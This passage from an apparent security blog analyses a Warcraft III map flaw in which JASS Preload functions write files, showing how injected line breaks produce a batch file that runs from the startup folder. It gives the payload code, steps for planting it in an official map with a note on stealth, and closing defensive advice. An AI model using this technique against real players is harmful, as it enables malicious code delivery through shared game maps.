nothing\u003C\u002Fli>\u003C\u002Ful>\u003Cp>The above three functions are used to record all Preload() statements executed between PreloadGenStart() and PreloadGenEnd(), and write them into the pld file specified by the PreloadGenEnd() function\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Similar to outputting a log file\u003C\u002Fp>\u003Cp>\u003Cstrong>Example:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The JASS code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>function Test takes nothing returns nothing\u003Cbr>    call PreloadGenClear()\u003Cbr>    call PreloadGenStart()\u003Cbr>    call Preload( \"ReplaceableTextures \\\\CameraMasks\\\\White_mask.blp\" )\u003Cbr>    call PreloadGenEnd(\"c:\\\\test\\\\test.pld\")\u003Cbr>endfunction\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>After executing the function Test(), a new file test.pld will be created under c:\\test\\, with the following content written:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>function Test takes nothing returns nothing\u003Cbr>    call Preload( \"ReplaceableTextures \\\\CameraMasks\\\\White_mask.blp\" )\u003Cbr>    call PreloadEnd( 0.0 )\u003Cbr>endfunction\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>Vulnerability Principle\u003C\u002Fh3>\u003Ch3>1. Setting the output as a .bat file\u003C\u002Fh3>\u003Cp>If the output .pld file extension is changed to .bat, each line in the file is executed as a piece of code (though the statements are invalid and do not conform to batch processing syntax), as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018786593_2_e635d0fb83-1.jpeg\">\u003C\u002Fp>\u003Ch3>2. Adding line breaks \\n\u003C\u002Fh3>\u003Cp>In batch syntax, \\n represents a line break. Although each line of the .pld file output has a fixed format, by using \\n to break the content in the call Preload() line, it becomes possible to display an executable batch command on a new line.\u003C\u002Fp>\u003Cp>\u003Cstrong>Example:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>JASS code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>function Test takes nothing returns nothing\u003Cbr>    call PreloadGenClear()\u003Cbr>    call PreloadGenStart()\u003Cbr>    call Preload(\"\\n@echo Test\\n\")\u003Cbr>    call PreloadGenEnd(\"c:\\\\test\\\\test.bat\")\u003Cbr>endfunction\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>After outputting to test.bat, it will contain line breaks. The content of the output file is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>function Test takes nothing returns nothing\u003Cbr>    call Preload( \"\u003Cbr>@echo Test\u003Cbr>\" )\u003Cbr>    call PreloadEnd( 0.0 )\u003Cbr>endfunction\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>At this point, a new line of code @echo Test is generated, and @echo Test gets executed, as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018799501_3_09c450fea2-1.jpeg\">\u003C\u002Fp>\u003Ch3>3. Execute batch processing\u003C\u002Fh3>\u003Cp>By default, JASS can only output files but cannot execute them, so files can only be output to the startup items directory and executed after restarting\u003C\u002Fp>\u003Ch2>0x04 Actual Testing\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Test HelloGA2012.w3m\u003C\u002Fh3>\u003Cp>\u003Cstrong>Download link:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Attachment from: http:\u002F\u002Fbbs.islga.org\u002Fforum.php?mod=viewthread&amp;tid=48422&amp;extra=page%3D1&amp;page=1\u003C\u002Fp>\u003Cp>War3 version: 1.27.0.52240\u003C\u002Fp>\u003Cp>After loading the map HelloGA2012 and entering the game, press the Esc key. As shown in the figure, a prompt pops up, and the file test.pld is generated under D:\\XX\\\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018807009_4_18f1e53bff-1.jpeg\">\u003C\u002Fp>\u003Cp>Navigate to directory D:\\XX\\, locate test.pld with the following content:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>function PreloadFiles takes nothing returns nothing\u003Cbr>\u003Cbr>  call Preload( \"\u003Cbr>@cls\u003Cbr>@color a\u003Cbr>@echo Hello World\u003Cbr>@echo This is a sample of WC3 map generated BAT file.\u003Cbr>@echo Welcome to http:\u002F\u002Fbbs.islga.org. Let's go 2012 with GA!\u003Cbr>@pause\u003Cbr>@exit\u003Cbr>\" )\u003Cbr>  call PreloadEnd( 0.0 )\u003Cbr>\u003Cbr>endfunction\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Test successful\u003C\u002Fp>\u003Ch3>2. Manually modify the official map LostTemple\u003C\u002Fh3>\u003Cp>(1) Obtain source file\u003C\u002Fp>\u003Cp>Open the official map (4)LostTemple.w3m using HkeW3mModifier, export war3map.j\u003C\u002Fp>\u003Cp>(2) Add payload\u003C\u002Fp>\u003Cp>Based on the analysis of the file structure in war3map.j above, add the following code within function Trig_Melee_Initialization_Actions:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>call PreloadGenClear()\u003Cbr>call PreloadGenStart()\u003Cbr>call Preload(\"\\n@echo Test\\n\")\u003Cbr>call PreloadGenEnd(\"c:\\\\test\\\\test.bat\")\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018813595_5_50e167a2db-1.jpeg\">\u003C\u002Fp>\u003Cp>(3) Save\u003C\u002Fp>\u003Cp>After saving war3map.j, select replace (add) file in HkeW3mModifier, as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018820061_6_e336eb5af1-1.jpeg\">\u003C\u002Fp>\u003Cp>Select recompress, save the map file, as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018825758_7_5dc98a21e9-1.jpeg\">\u003C\u002Fp>\u003Cp>(4) Testing\u003C\u002Fp>\u003Cp>Place the map in the Maps folder, launch the game, and the map is recognized, as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018829861_8_97ba8c5efe-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>For testing convenience, the map name has been changed to Test; overwriting the original map provides greater stealth\u003C\u002Fp>\u003Cp>Start the game, a file test.bat is generated under c:\\test\\ with the following content:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>function PreloadFiles takes nothing returns nothing\u003Cbr>\u003Cbr>  call Preload( \"\u003Cbr>@echo Test\u003Cbr>\" )\u003Cbr>  call PreloadEnd( 0.0 )\u003Cbr>\u003Cbr>endfunction\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>If this file is output to the startup directory, it will execute after a reboot\u003C\u002Fp>\u003Cp>Test successful\u003C\u002Fp>\u003Ch2>0x05 Supplement\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>1. This vulnerability itself does not include code execution functionality, so the key to successful exploitation lies in finding a method to execute code. The most direct approach is to output files to the startup folder. Of course, this vulnerability can also be used to modify specified files.\u003C\u002Fp>\u003Cp>2. In Dota maps, the location of war3map.j is scripts\\war3map.j, which can also be utilized.\u003C\u002Fp>\u003Ch2>0x06 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Strictly speaking, this Warcraft III vulnerability is not a vulnerability per se, but rather a normal function within Warcraft III maps that supports outputting files. By exploiting this function, carefully crafted code can be output to specific locations and then executed in conjunction with other methods.\u003C\u002Fp>\u003Cp>Therefore, the key to exploiting this vulnerability lies in the execution method, with the common approach being writing to the startup folder.\u003C\u002Fp>\u003Cp>For ordinary users, it is important to pay attention to the startup folder on their own machines. Additionally, antivirus software is already capable of detecting this exploitation method.\u003C\u002Fp>\u003Cp>Stay vigilant and protect yourself to avoid being deceived.\u003C\u002Fp>\u003Cp>Moderate gaming benefits the mind, while excessive gaming harms the body.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",1322,"Onedaysec",7,"published","2026-02-02T08:04:56.384Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"War3 Map Vulnerability Analysis: JASS Exploit & Defense Guide","Warcraft 3 vulnerability, JASS exploit, War3 map security, Loli worm analysis, HkeW3mModifier, MPQ file editing, game hacking prevention",null,false,[],{"docs":43,"hasNextPage":40},[4,44,45,46,47],370,369,368,367,{"title":39,"description":39,"image":39},"2026-07-24T15:37:13.861Z","2026-07-23T16:01:27.231Z","draft","2026-07-23T16:05:41.439Z"]